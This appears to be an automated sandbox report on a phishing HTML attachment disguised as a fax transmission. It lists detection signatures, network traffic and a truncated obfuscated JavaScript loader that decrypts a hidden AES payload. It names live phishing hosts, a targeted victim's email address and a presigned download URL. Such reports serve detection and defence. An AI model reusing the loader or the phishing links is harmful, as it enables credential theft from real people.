Windows Analysis Report
https://phisher-parts-production-us-east-1.s3.amazonaws.com/68a29cbc-d8f9-4c01-aa8b-704c527e3dea/2024-10-24/hdp1f4m0mtn58r7e5djj3r2baep1oktpuitii5o1/d493f6c6bdfdcf5959ae27c95155d91b5b3c1ce0bab14ef02ea76d7c451b0ee9?response-content-disposition=attachment%3B%20filename%3D%22FaxDocument-873422-Wcepinc-

Overview

General Information

Sample URL:	https://phisher-parts-production-us-east-1.s3.amazonaws.com/68a29cbc-d8f9-4c01-aa8b-704c527e3dea/2024-10-24/hdp1f4m0mtn58r7e5djj3r2baep1oktpuitii5o1/d493f6c6bdfdcf5959ae27c95155d91b5b3c1ce0bab14ef02ea
Analysis ID:	1541500
Infos:

Detection

Phisher

Score:	48
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected Phisher

Creates files inside the system directory

Deletes files inside the Windows folder

Detected hidden input values containing email addresses (often used in phishing pages)

Detected non-DNS traffic on DNS port

HTML page contains hidden javascript code

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Usage Of Web Request Commands And Cmdlets

Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Classification

Signatures

Phishing

Yara detected Phisher

Source: Yara match

File source: dropped/chromecache_131, type: DROPPED

Detected hidden input values containing email addresses (often used in phishing pages)

Source: https://www.inparsolucoes.com.br/images/pbcmc.php

HTTP Parser: aesparza@wcepinc.com

HTML page contains hidden javascript code

Source: file:///C:/Users/user/Desktop/download/FaxDocument-873422-Wcepinc-Transmission.html

HTTP Parser: Base64 decoded: needlessness{display:inline-block;position:relative;width:80px;height:80px}.needlessness div{animation:1.2s cubic-bezier(.5,0,.5,1) infinite needlessness;transform-origin:40px 40px}.needlessness div:after{content:" ";display:block;position:absolute;width:...

Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Source: https://www.inparsolucoes.com.br/images/pbcmc.php?6104797967704b53693230746450795538757953387153537771536b7a507a307655533837503155744a3166637a4e416f6f30776341waxwork

HTTP Parser: var academy= document.createelement("script");academy.setattribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(academy);academy.onload=function(){var {a,b,c,d} = json.parse(atob("eyjhijoiyuxsuhkwvfpfegpqelhxdwzvnitkajnzwedpossybklyagtem29vz1divkc0qtirvgp4cnzpzdvvanvbbxpmqnq3c2h2ymhdrus4agpmstbkn0xyenpjvm1xoudqyuzhbg1ka3fbq3bcu3dxz1jiajbiwetizghmoepkanzua3rgegrjvhjjudjnr2nlrve2qnvnr2rzuva1bkxza0h1ueu2ognwwlmwcfr3r3rhrlj6k3u4oejvwtzkz24yzhvyoejicvbytlfbum8zau1jzw94zlb2wlwvnlrjrlpknwzvdfzjdu4xwlzzr3o0dkdonzdrtfhhrg9cqtnzalcxu045t3nbmur4mhbmslniwk82yulumwztahy5tvfqm1pvvei0qmpkneiybkhqaedavwvzd0pobjjrtlrbaffod3vlc3h3slc1mfnscwrrvdizmlqzzxvnyzfqz0ltv2dydlczqtjwmja5sgl1b1lhwthozg10wwtydfwvqxhqrjbqzgvpnhhnzhpvazdybvwvq2v1zgqwzdczejk5vddxue50mjnmb0jevunim2zxnvnod1datdk4eutzchjck2ncl3zqrld5unbiynfruunvzkm1ee9srwi1qufltk1ouetqevl3ahkyck9hennlee1ybkxccmx1c2dqalzoukfxbeo4oxvdcjzcu3d2t0ljcxhnmnlrbjq4zwlvnm1sowhss0p3ovbitglzq1jcl1nmn0r1azu5wjjhovjzzdn1n21cl2q...

Source: file:///C:/Users/user/Desktop/download/FaxDocument-873422-Wcepinc-Transmission.html	HTTP Parser: No favicon
Source: https://www.inparsolucoes.com.br/images/pbcmc.php	HTTP Parser: No favicon
Source: https://doctortarragona.com.de/N12Pv/#8aesparza@wcepinc.com	HTTP Parser: No favicon
Source: https://doctortarragona.com.de/N12Pv/#8aesparza@wcepinc.com	HTTP Parser: No favicon

Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.5.10.199:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.6:49787 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:49832 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49851 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.242.39.171:443 -> 192.168.2.6:57019 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.6:57027 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.6:57043 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.6:57053 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:57063 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:57081 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:53007 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:53011 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:53014 version: TLS 1.2

Source: chrome.exe

Memory has grown: Private usage: 8MB later: 34MB

Detected non-DNS traffic on DNS port

Source: global traffic	TCP traffic: 192.168.2.6:52967 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.6:57011 -> 162.159.36.2:53

Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45

Source: global traffic	HTTP traffic detected: GET /68a29cbc-d8f9-4c01-aa8b-704c527e3dea/2024-10-24/hdp1f4m0mtn58r7e5djj3r2baep1oktpuitii5o1/d493f6c6bdfdcf5959ae27c95155d91b5b3c1ce0bab14ef02ea76d7c451b0ee9?response-content-disposition=attachment%3B%20filename%3D%22FaxDocument-873422-Wcepinc-Transmission.html%22%3B%20filename%3DUTF-8''FaxDocument-873422-Wcepinc-Transmission.html&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIA37KREM2QLQCGJML5%2F20241024%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241024T201816Z&X-Amz-Expires=15711&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEHMaCXVzLWVhc3QtMSJIMEYCIQD5%2BhZvZGN6J3Fxb1eh7JhGJFYatdM4YSe%2FB1Lhu54clwIhAMGxuFEnQyuPv%2FCfNJf%2FM%2Bjk%2FqrMeNeOhUAY3BKeKKVEKogECNz%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMODIzMTkzMjY1ODI0IgxkadsnklCVctvwMWIq3APvQpQpI58knFBaUI%2FesQH1FJlTX%2BlsdPXwHmIEoA7JJLDUXnDzzteCVoUwvp1olI1h3PTJSpl3WxfIUi7BTzihzEqp3qn85AWXiDO1fWB1MbpD%2FSDfsrqMEgho9OQjpzPsQHM6e%2BmLmZ1yTIHD97Pf%2FN08letrYEZz2NFJVIQrLYTvWQwr2QPEZJyIm0WnuSbbq8Q1iYmha%2FIyVB9ZKxOPpvdgR1ptXZ6oLjzsy%2Bt%2BjafEISWZYsRDWwvLzIujqWG%2B63t%2BpCq3bxmYAsSHjxnzarIm7Hms4AOj9sIvR9pkL0wwD3qkWG7oBYHnb8k0%2B1AzzdJ2e%2FfLVD9TiwcG1KsTEzsabHJpEEBXTzducKIDP%2FcB%2FYcv03kyJnwWzUMaIbwdRV3lLj4itVuLpZpUbOm8RJChRMb83TR2qZdNKkjYktSR42en1uqps%2BU0qDC%2Fg93%2FFw2lIXwuMoTybf1fWYEY2OQz6E5eRoigwQhmg4wJe1ZZgjwP8fEQSG0yo9XZnXr%2FyAu%2BEt2RNzWy2wHuoZk3HVwPs4lWnhTyTcrSndmgKXkfVSpHeqCqkF3xveAbEhd%2F9qQutDIIcWnBBAlsILK5EUpHzYLvkIMYBMTieCtf00%2FFHqO4eOCLX5sGvDCHqeq4BjqkAeyFM5a%2FebzwF4uw87xMbquzIriBZ00BbMxSr1F6iNQrK5eiAmnkSYUYh%2Fp3YJofaU0ox8%2FOVLIHBKp3WtDzd5b5%2F5WwioyMhT1u0BDnhNT%2F%2B11YTTeSy4rC4fIYdhkm7tZrFS9Sa1WIiQXgQiBqqjkRydZT%2FLrmsyVTvK8wBscWkRvZxnU%2Bsi4OUJJHkmJ27ywwC3Ob5nE4D4%2FwrYfIb%2F4HWJO4&X-Amz-SignedHeaders=host&X-Amz-Signature=4bd824e8586cb631d993afbaa40b83fff9764a3fdcecf7e4b686cf1557dfa0d0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoAccept: /*Accept-Encoding: identityHost: phisher-parts-production-us-east-1.s3.amazonaws.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /images/pbcmc.php?6104797967704b53693230746450795538757953387153537771536b7a507a307655533837503155744a3166637a4e416f6f30776341waxwork HTTP/1.1Host: www.inparsolucoes.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /images/pbcmc.php?6104797967704b53693230746450795538757953387153537771536b7a507a307655533837503155744a3166637a4e416f6f30776341waxwork HTTP/1.1Host: www.inparsolucoes.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.inparsolucoes.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.inparsolucoes.com.br/images/pbcmc.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.inparsolucoes.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /N12Pv/ HTTP/1.1Host: doctortarragona.com.deConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://www.inparsolucoes.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
